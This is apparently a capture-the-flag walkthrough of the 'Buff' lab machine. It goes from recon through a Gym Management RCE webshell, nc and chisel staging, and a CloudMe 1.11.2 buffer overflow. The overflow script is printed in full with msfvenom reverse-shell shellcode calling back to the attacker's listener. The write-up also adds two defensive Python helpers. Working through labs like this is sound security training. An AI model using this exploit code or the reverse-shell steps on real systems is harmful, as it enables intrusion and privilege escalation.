Buff

1. Recon

1.1. nmap

The nmap scan shows an HTTP service on port 8080.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# nmap -sC -sV 10.129.2.18 --max-retries 1 --min-rate 5000 -p- 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 12:29 +04
Nmap scan report for 10.129.2.18
Host is up (0.26s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.92 seconds

1.2. Web recon on port 8080

Nothing special was visible in the web service on that port.

But opening the Contact page showed the text "Gym Management Software 1.0".

2. Initial Access

2.1. searchsploit lookup

A searchsploit lookup shows that an RCE vulnerability exists for this software.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# searchsploit gym management
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection                                    | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                                 | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting                           | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution                 | php/webapps/48506.py
GYM MS - GYM Management System - Cross Site Scripting (Stored)                    | php/webapps/51777.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

2.2. Getting a shell

Running that exploit gave a shell right away.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# python2 48506.py http://10.129.2.18:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,                                                              
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> 

One of the users was shaun, and the user flag was in that user's Desktop folder.

C:\xampp\htdocs\gym\upload> dir C:\Users\
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users

16/06/2020  19:52    <DIR>          .
16/06/2020  19:52    <DIR>          ..
05/01/2026  08:14    <DIR>          Administrator
16/06/2020  14:08    <DIR>          Public
16/06/2020  14:11    <DIR>          shaun
               0 File(s)              0 bytes
               5 Dir(s)   8,337,043,456 bytes free

C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt

3. Lateral Movement

3.1. Installing nc

The current shell is the one the exploit gave us, so to work from a stable reverse shell instead, install nc.

C:\xampp\htdocs\gym\upload> copy \\10.10.14.143\share\nc.exe .
        1 file(s) copied.

C:\xampp\htdocs\gym\upload> dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

05/01/2026  09:39    <DIR>          .
05/01/2026  09:39    <DIR>          ..
05/01/2026  09:31                53 kamehameha.php
05/01/2026  09:39            59,392 nc.exe
               2 File(s)         59,445 bytes
               2 Dir(s)   8,518,074,368 bytes free

After installing nc and catching the reverse shell, use tasklist to see what is running on the box. Among the processes, CloudMe.exe stands out.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# rlwrap -cAr nc -lnvp 443                                        
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.2.18] 50372
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload>tasklist
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         28 K
Registry                       104                            0      4,576 K
smss.exe                       364                            0        416 K
csrss.exe                      444                            0      1,996 K

[...SNIP...]

CloudMe.exe                   3832                            0     37,700 K
timeout.exe                   8164                            0      3,968 K
tasklist.exe                  4112                            0      7,748 K

C:\xampp\htdocs\gym\upload>

3.2. Identifying the CloudMe.exe vulnerability

CloudMe.exe was in the Downloads folder, with the number 1112, presumably the version, appended to its filename.

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  12:27    <DIR>          .
14/07/2020  12:27    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   8,652,206,080 bytes free

Checking searchsploit, we can infer that 1112 means version 1.11.2.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# searchsploit cloudme      
-------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)               | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)               | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)              | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)       | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt               | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)      | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)    | windows_x86-64/remote/44784.py
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

3.3. Finding suspicious programs with netstat and tasklist

To gather more information, use netstat to check whether other services are running. Something is listening on port 8888.

C:\Users\shaun\Downloads>netstat -ano
netstat -ano

Active Connections                                                                              
                                                                                                
  Proto  Local Address          Foreign Address        State           PID                      
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       960                      
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4                        
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6372
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       1180
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       8704
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       544
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1056
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1752
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2200
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       688
  TCP    10.129.2.18:139        0.0.0.0:0              LISTENING       4
  TCP    10.129.2.18:8080       10.10.14.143:44384     ESTABLISHED     8704
  TCP    10.129.2.18:50377      10.10.14.143:443       ESTABLISHED     4492
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8816
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       1876

[...SNIP...]

Normally, after running netstat, you would look up the program whose PID matches the suspicious port. But on this machine, every time tasklist is run, the PID of CloudMe.exe has changed.

C:\xampp\htdocs\gym\upload>tasklist /v | findstr Cloud
tasklist /v | findstr Cloud
CloudMe.exe                   5600                            0     37,300 K Unknown         N/A                                                     0:00:00 N/A                                                                     

C:\xampp\htdocs\gym\upload>tasklist /v | findstr Cloud
tasklist /v | findstr Cloud
CloudMe.exe                   7108                            0     37,232 K Unknown         N/A                                                     0:00:00 N/A                                                                     

C:\xampp\htdocs\gym\upload>tasklist /v | findstr Cloud
tasklist /v | findstr Cloud
CloudMe.exe                   8792                            0     38,504 K Unknown         N/A                                                     0:00:00 N/A                                                                     

So I used a PowerShell one-liner that resolves the process owning port 8888 in one go.

C:\xampp\htdocs\gym\upload>powershell -c "Get-NetTCPConnection -LocalPort 8888 | Select-Object LocalPort, OwningProcess, @{Name='ProcessName';Expression={(Get-Process -Id $_.OwningProcess).ProcessName}}"
powershell -c "Get-NetTCPConnection -LocalPort 8888 | Select-Object LocalPort, OwningProcess, @{Name='ProcessName';Expression={(Get-Process -Id $_.OwningProcess).ProcessName}}"

LocalPort OwningProcess ProcessName
--------- ------------- -----------
     8888          7764 CloudMe    
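As an added example (not part of the original writeup), the following Python script does offline what the PowerShell one-liner above does live: it parses saved netstat -ano and tasklist output, names the process behind each listening socket, and marks the ones bound to loopback only, which an external nmap scan never shows. It goes slightly beyond the page by also handling IPv6 binds and UDP rows. The two sample listings are constructed (abbreviated from the output above, with process names for PIDs 960, 8704 and 8816 assumed), so it runs without a target.

```python
"""Name the process behind each listening socket from saved `netstat -ano` / `tasklist` output.

Added example for this writeup; not code from the original post. The samples below are
constructed (abbreviated from the listings above; names for PIDs 960, 8704, 8816 assumed).
"""
import re
from collections import namedtuple

Listener = namedtuple("Listener", "proto addr port pid")

NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       8704
  TCP    [::]:135               [::]:0                 LISTENING       960
  TCP    10.129.2.18:8080       10.10.14.143:44384     ESTABLISHED     8704
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8816
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       1876
  UDP    0.0.0.0:5353           *:*                                    2236
"""

TASKLIST_OUTPUT = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
svchost.exe                    960 Services                   0      9,120 K
httpd.exe                     8704 Services                   0     20,440 K
mysqld.exe                    8816 Services                   0     50,100 K
CloudMe.exe                   1876                            0     37,700 K
"""


def parse_netstat(text):
    """Return bound sockets: every LISTENING TCP row and every UDP row (UDP has no State column)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        state = parts[3] if proto == "TCP" else "LISTENING"
        if state != "LISTENING":
            continue  # ESTABLISHED and friends are conversations, not exposed services
        addr, _, port = local.rpartition(":")  # rpartition keeps IPv6 such as [::]:135 intact
        rows.append(Listener(proto, addr, int(port), int(parts[-1])))
    return rows


def parse_tasklist(text):
    """Map PID -> image name. The '====' ruler gives the Image Name column width,
    so names containing spaces (System Idle Process) are sliced correctly."""
    lines = text.splitlines()
    ruler = next(l for l in lines if l.startswith("="))
    name_width = re.match(r"=+", ruler).end()
    procs = {}
    for line in lines:
        rest = line[name_width:].split()
        if line.startswith("=") or not rest or not rest[0].isdigit():
            continue  # header, ruler, blank lines
        procs[int(rest[0])] = line[:name_width].strip()
    return procs


def name_listeners(netstat_text, tasklist_text):
    """Join the two views; flag loopback-only binds, which external scans never show."""
    procs = parse_tasklist(tasklist_text)
    return [
        {
            "proto": l.proto, "port": l.port, "pid": l.pid,
            "process": procs.get(l.pid, "<pid not in tasklist>"),
            "loopback_only": l.addr in ("127.0.0.1", "[::1]"),
        }
        for l in parse_netstat(netstat_text)
    ]


if __name__ == "__main__":
    for entry in name_listeners(NETSTAT_OUTPUT, TASKLIST_OUTPUT):
        scope = "loopback only" if entry["loopback_only"] else "all interfaces"
        print(f"{entry['proto']}/{entry['port']:<5} pid {entry['pid']:<5} {entry['process']:<22} {scope}")
```

Because the join is by PID, both listings have to come from the same moment; with a process that restarts as often as CloudMe.exe does here, capture them back to back or use the live Get-NetTCPConnection join from the page. A loopback-only listener such as 8888 is invisible to an external scan but reachable to anything that already runs code on the host, so it belongs in the patch inventory like any other service.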

3.4. Tunnelling port 8888 with chisel

Port 8888 is bound to the loopback interface, so it can't be reached directly from Kali. The port has to be tunnelled, and we use Chisel for that.

C:\ProgramData>copy \\10.10.14.143\share\Chisel.exe c.exe
copy \\10.10.14.143\share\Chisel.exe c.exe
The system cannot find the file specified.

C:\ProgramData>copy \\10.10.14.143\share\chisel.exe c.exe
copy \\10.10.14.143\share\chisel.exe c.exe
        1 file(s) copied.

C:\ProgramData>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\ProgramData

05/01/2026  10:56        10,612,224 c.exe
16/06/2020  14:10    <DIR>          Microsoft OneDrive
16/06/2020  14:14    <DIR>          Package Cache
14/07/2020  12:17    <DIR>          Packages
05/01/2026  10:55    <DIR>          regid.1991-06.com.microsoft
11/04/2018  23:38    <DIR>          SoftwareDistribution
16/06/2020  14:09    <DIR>          USOPrivate
16/06/2020  14:09    <DIR>          USOShared
16/06/2020  14:14    <DIR>          VMware
12/04/2018  09:21    <DIR>          WindowsHolographicDevices
               1 File(s)     10,612,224 bytes
               9 Dir(s)   9,797,062,656 bytes free

C:\ProgramData>.\c.exe client 10.10.14.143:8000 R:8888:localhost:8888
.\c.exe client 10.10.14.143:8000 R:8888:localhost:8888
2026/01/05 10:59:36 client: Connecting to ws://10.10.14.143:8000
2026/01/05 10:59:37 client: Connected (Latency 187.7175ms)

On Kali, start the chisel server in reverse mode.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# ./chisel_1.11.3_linux_arm64 server -p 9999 --reverse
2026/01/05 16:28:28 server: Reverse tunnelling enabled
2026/01/05 16:28:28 server: Fingerprint 8c9MqUC1R4cP+va/exEn9Sdw5k+YgykvwSNnMQJkZ6k=
2026/01/05 16:28:28 server: Listening on http://0.0.0.0:9999
2026/01/05 16:29:04 server: session#1: tun: proxy#R:8888=>8888: Listening

Then point the client at port 9999.

C:\ProgramData>.\c.exe client 10.10.14.143:9999 R:8888:127.0.0.1:8888
.\c.exe client 10.10.14.143:9999 R:8888:127.0.0.1:8888
2026/01/05 12:29:08 client: Connecting to ws://10.10.14.143:9999
2026/01/05 12:29:09 client: Connected (Latency 190.2364ms)

4. Privilege Escalation

4.1. Building the payload

searchsploit has an RCE for CloudMe, so we use it. As the code below shows, its payload was generated with #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python; since we want a reverse shell, we'll swap in a different payload.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# cat 48389.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)
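From the defender's side, the buffer layout above (1052 filler bytes, a return address, a 30-byte NOP sled, the encoded body, and padding to 1500 bytes) is also the signature to look for. The following is an added example, not code from the writeup or from the PoC author: a heuristic check that flags a message to a TCP service when it is longer than the service should ever accept or carries a long run of 0x90 bytes. The thresholds and the three sample messages are constructed for the demonstration; the overflow-shaped sample mirrors the PoC's layout with placeholder bytes and no shellcode.

```python
"""Heuristic check for overflow-shaped input to a TCP service.

Added example for this writeup (not from the original post or the PoC author).
Thresholds and sample messages are constructed for the demonstration.
"""

# Assumed limits: a message longer than the service's expected maximum, or one carrying
# a long run of 0x90 (x86 NOP) bytes, is reported. The PoC above uses 1052 filler bytes,
# a 30-byte sled and a 1500-byte total, so both rules fire on that shape.
MAX_EXPECTED_LEN = 1024   # constructed: longest message the service is expected to handle
MIN_SLED_LEN = 16         # constructed: this many consecutive 0x90 bytes counts as a sled


def longest_byte_run(data: bytes, value: int) -> int:
    """Length of the longest consecutive run of `value` in `data`."""
    best = run = 0
    for b in data:
        run = run + 1 if b == value else 0
        best = max(best, run)
    return best


def classify_message(data: bytes) -> list:
    """Return the reasons a message looks like an overflow attempt; an empty list means benign."""
    reasons = []
    if len(data) > MAX_EXPECTED_LEN:
        reasons.append(f"length {len(data)} exceeds {MAX_EXPECTED_LEN}")
    sled = longest_byte_run(data, 0x90)
    if sled >= MIN_SLED_LEN:
        reasons.append(f"NOP sled of {sled} bytes")
    return reasons


# Constructed samples. OVERFLOW_SHAPED mirrors the PoC's layout (filler, four placeholder
# address bytes, sled, opaque body, trailing overrun) with no shellcode at all.
BENIGN = b"hello\r\n"
LONG_ONLY = b"A" * 1100
OVERFLOW_SHAPED = (b"\x90" * 1052 + b"\xef\xbe\xad\xde" + b"\x90" * 30
                   + b"X" * 351 + b"C" * 63)

if __name__ == "__main__":
    for name, msg in [("benign", BENIGN), ("long only", LONG_ONLY),
                      ("overflow-shaped", OVERFLOW_SHAPED)]:
        print(f"{name:<16} {len(msg):>5} bytes -> {classify_message(msg) or 'ok'}")
```

The length rule is the one that survives encoder changes: msfvenom produces different bytes on every run, but the overflow still has to push more than 1052 bytes past the start of the buffer to reach the saved return address. Since port 8888 is only reachable from the host itself, a hit here means something local is already feeding attacker-controlled input to the service; the fix that removes the alert for good is patching or removing the vulnerable CloudMe build.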

First, switch the payload to shell_reverse_tcp, set LHOST and LPORT, and regenerate it. Then replace the payload in the code above and run it.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.143 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload =  b""
payload += b"\xbb\xa1\xf4\xb9\x42\xdb\xd9\xd9\x74\x24\xf4"
payload += b"\x58\x31\xc9\xb1\x52\x31\x58\x12\x03\x58\x12"
payload += b"\x83\x61\xf0\x5b\xb7\x9d\x11\x19\x38\x5d\xe2"
payload += b"\x7e\xb0\xb8\xd3\xbe\xa6\xc9\x44\x0f\xac\x9f"
payload += b"\x68\xe4\xe0\x0b\xfa\x88\x2c\x3c\x4b\x26\x0b"
payload += b"\x73\x4c\x1b\x6f\x12\xce\x66\xbc\xf4\xef\xa8"
payload += b"\xb1\xf5\x28\xd4\x38\xa7\xe1\x92\xef\x57\x85"
payload += b"\xef\x33\xdc\xd5\xfe\x33\x01\xad\x01\x15\x94"
payload += b"\xa5\x5b\xb5\x17\x69\xd0\xfc\x0f\x6e\xdd\xb7"
payload += b"\xa4\x44\xa9\x49\x6c\x95\x52\xe5\x51\x19\xa1"
payload += b"\xf7\x96\x9e\x5a\x82\xee\xdc\xe7\x95\x35\x9e"
payload += b"\x33\x13\xad\x38\xb7\x83\x09\xb8\x14\x55\xda"
payload += b"\xb6\xd1\x11\x84\xda\xe4\xf6\xbf\xe7\x6d\xf9"
payload += b"\x6f\x6e\x35\xde\xab\x2a\xed\x7f\xea\x96\x40"
payload += b"\x7f\xec\x78\x3c\x25\x67\x94\x29\x54\x2a\xf1"
payload += b"\x9e\x55\xd4\x01\x89\xee\xa7\x33\x16\x45\x2f"
payload += b"\x78\xdf\x43\xa8\x7f\xca\x34\x26\x7e\xf5\x44"
payload += b"\x6f\x45\xa1\x14\x07\x6c\xca\xfe\xd7\x91\x1f"
payload += b"\x50\x87\x3d\xf0\x11\x77\xfe\xa0\xf9\x9d\xf1"
payload += b"\x9f\x1a\x9e\xdb\xb7\xb1\x65\x8c\xbd\x4f\x6b"
payload += b"\xc3\xaa\x4d\x73\xda\x91\xdb\x95\xb6\xf5\x8d"
payload += b"\x0e\x2f\x6f\x94\xc4\xce\x70\x02\xa1\xd1\xfb"
payload += b"\xa1\x56\x9f\x0b\xcf\x44\x48\xfc\x9a\x36\xdf"
payload += b"\x03\x31\x5e\x83\x96\xde\x9e\xca\x8a\x48\xc9"
payload += b"\x9b\x7d\x81\x9f\x31\x27\x3b\xbd\xcb\xb1\x04"
payload += b"\x05\x10\x02\x8a\x84\xd5\x3e\xa8\x96\x23\xbe"
payload += b"\xf4\xc2\xfb\xe9\xa2\xbc\xbd\x43\x05\x16\x14"
payload += b"\x3f\xcf\xfe\xe1\x73\xd0\x78\xee\x59\xa6\x64"
payload += b"\x5f\x34\xff\x9b\x50\xd0\xf7\xe4\x8c\x40\xf7"
payload += b"\x3f\x15\x70\xb2\x1d\x3c\x19\x1b\xf4\x7c\x44"
payload += b"\x9c\x23\x42\x71\x1f\xc1\x3b\x86\x3f\xa0\x3e"
payload += b"\xc2\x87\x59\x33\x5b\x62\x5d\xe0\x5c\xa7"

4.2. Modified 48389.py

The modified code is below.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# cat 48389.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.143 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
payload =  b""
payload += b"\xbb\xa1\xf4\xb9\x42\xdb\xd9\xd9\x74\x24\xf4"
payload += b"\x58\x31\xc9\xb1\x52\x31\x58\x12\x03\x58\x12"
payload += b"\x83\x61\xf0\x5b\xb7\x9d\x11\x19\x38\x5d\xe2"
payload += b"\x7e\xb0\xb8\xd3\xbe\xa6\xc9\x44\x0f\xac\x9f"
payload += b"\x68\xe4\xe0\x0b\xfa\x88\x2c\x3c\x4b\x26\x0b"
payload += b"\x73\x4c\x1b\x6f\x12\xce\x66\xbc\xf4\xef\xa8"
payload += b"\xb1\xf5\x28\xd4\x38\xa7\xe1\x92\xef\x57\x85"
payload += b"\xef\x33\xdc\xd5\xfe\x33\x01\xad\x01\x15\x94"
payload += b"\xa5\x5b\xb5\x17\x69\xd0\xfc\x0f\x6e\xdd\xb7"
payload += b"\xa4\x44\xa9\x49\x6c\x95\x52\xe5\x51\x19\xa1"
payload += b"\xf7\x96\x9e\x5a\x82\xee\xdc\xe7\x95\x35\x9e"
payload += b"\x33\x13\xad\x38\xb7\x83\x09\xb8\x14\x55\xda"
payload += b"\xb6\xd1\x11\x84\xda\xe4\xf6\xbf\xe7\x6d\xf9"
payload += b"\x6f\x6e\x35\xde\xab\x2a\xed\x7f\xea\x96\x40"
payload += b"\x7f\xec\x78\x3c\x25\x67\x94\x29\x54\x2a\xf1"
payload += b"\x9e\x55\xd4\x01\x89\xee\xa7\x33\x16\x45\x2f"
payload += b"\x78\xdf\x43\xa8\x7f\xca\x34\x26\x7e\xf5\x44"
payload += b"\x6f\x45\xa1\x14\x07\x6c\xca\xfe\xd7\x91\x1f"
payload += b"\x50\x87\x3d\xf0\x11\x77\xfe\xa0\xf9\x9d\xf1"
payload += b"\x9f\x1a\x9e\xdb\xb7\xb1\x65\x8c\xbd\x4f\x6b"
payload += b"\xc3\xaa\x4d\x73\xda\x91\xdb\x95\xb6\xf5\x8d"
payload += b"\x0e\x2f\x6f\x94\xc4\xce\x70\x02\xa1\xd1\xfb"
payload += b"\xa1\x56\x9f\x0b\xcf\x44\x48\xfc\x9a\x36\xdf"
payload += b"\x03\x31\x5e\x83\x96\xde\x9e\xca\x8a\x48\xc9"
payload += b"\x9b\x7d\x81\x9f\x31\x27\x3b\xbd\xcb\xb1\x04"
payload += b"\x05\x10\x02\x8a\x84\xd5\x3e\xa8\x96\x23\xbe"
payload += b"\xf4\xc2\xfb\xe9\xa2\xbc\xbd\x43\x05\x16\x14"
payload += b"\x3f\xcf\xfe\xe1\x73\xd0\x78\xee\x59\xa6\x64"
payload += b"\x5f\x34\xff\x9b\x50\xd0\xf7\xe4\x8c\x40\xf7"
payload += b"\x3f\x15\x70\xb2\x1d\x3c\x19\x1b\xf4\x7c\x44"
payload += b"\x9c\x23\x42\x71\x1f\xc1\x3b\x86\x3f\xa0\x3e"
payload += b"\xc2\x87\x59\x33\x5b\x62\x5d\xe0\x5c\xa7"


overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(e)  # sys was never imported and sys.exc_value is Python 2 only; the bound exception is enough

Run the script.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# python 48389.py

On the Kali listener, we get a connection as the administrator account.

┌──(root㉿kali)-[/home/kali/labs/Buff]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.2.18] 50472
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt